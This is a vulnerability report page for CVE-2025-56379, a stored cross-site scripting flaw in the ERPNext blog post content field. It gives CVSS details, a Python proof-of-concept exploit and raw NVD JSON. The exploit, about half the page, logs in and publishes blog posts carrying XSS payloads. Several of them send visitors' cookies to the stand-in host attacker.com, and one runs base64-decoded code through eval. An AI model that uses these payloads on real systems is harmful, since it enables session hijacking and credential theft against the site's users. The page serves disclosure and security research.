Security Vulnerability Report
CVE-2025-56379 CVSS 5.4 MEDIUM

CVE-2025-56379

Published: 2025-10-02 14:15:46
Last Modified: 2025-10-03 19:15:50

Description

A stored cross-site scripting (XSS) vulnerability in the blog post feature of ERPNEXT v15.67.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the content field.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:erpnext:15.67.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:frappe:frappe:15.72.4:*:*:*:*:*:*:* - VULNERABLE
ERPNEXT v15.67.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-56379 - ERPNEXT Stored XSS PoC
# Vulnerability: Stored XSS in Blog Post content field
# Affected Version: ERPNEXT v15.67.0
import requests

# Configuration
TARGET_URL = "https://target-erpnext-site.com"
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# Step 1: Login to ERPNEXT to obtain session cookies
session = requests.Session()
login_data = {
    "usr": USERNAME,
    "pwd": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/api/method/login", json=login_data)
print(f"Login status: {login_response.status_code}")

# Step 2: Craft malicious XSS payload for the blog content field
# Various payload options for bypassing filters
xss_payloads = [
    # Basic script tag payload
    "<script>alert('XSS-CVE-2025-56379');document.location='https://attacker.com/steal?c='+document.cookie</script>",
    # Img tag with onerror event handler
    "<img src=x onerror=\"alert(document.domain);fetch('https://attacker.com/log?data='+document.cookie)\">",
    # SVG tag with onload event handler
    "<svg onload=\"alert('Stored XSS');document.location='https://attacker.com/?cookie='+document.cookie\">",
    # Base64-encoded payload, decoded with atob() and run through eval()
    "<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>"
]

# Step 3: Create a blog post with the malicious payload
for idx, payload in enumerate(xss_payloads):
    blog_data = {
        "title": f"Interesting Blog Post {idx}",
        "content": payload,
        "blog_category": "General",
        "published": 1
    }
    create_response = session.post(
        f"{TARGET_URL}/api/resource/Blog Post",
        json=blog_data,
        headers={"Accept": "application/json"}
    )
    print(f"Blog post {idx} creation status: {create_response.status_code}")
    print(f"Response: {create_response.text}")

# Step 4: Verify the payload is stored and will execute when viewed
# When any user visits the blog post page, the malicious script will execute
print("\n[!] Malicious blog posts created successfully.")
print("[!] When any user views these blog posts, the XSS payload will execute in their browser.")
print("[!] Attacker can now steal session cookies, perform actions on behalf of victims, etc.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56379", "sourceIdentifier": "[email protected]", "published": "2025-10-02T14:15:45.630", "lastModified": "2025-10-03T19:15:49.603", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting (XSS) vulnerability in the blog post feature of ERPNEXT v15.67.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the content field."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:erpnext:15.67.0:*:*:*:*:*:*:*", "matchCriteriaId": "C2D1FAC2-E38C-45C7-84E3-0D82B1BE88DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe:15.72.4:*:*:*:*:*:*:*", "matchCriteriaId": 
"76F8F843-7675-4B36-9972-1D001E2869F9"}]}]}], "references": [{"url": "https://github.com/MoAlali/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/MoAlali/CVE-2025-56379", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.linkedin.com/in/mohammedaloli/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://x.com/alaliksa_", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/MoAlali/CVE-2025-56379", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}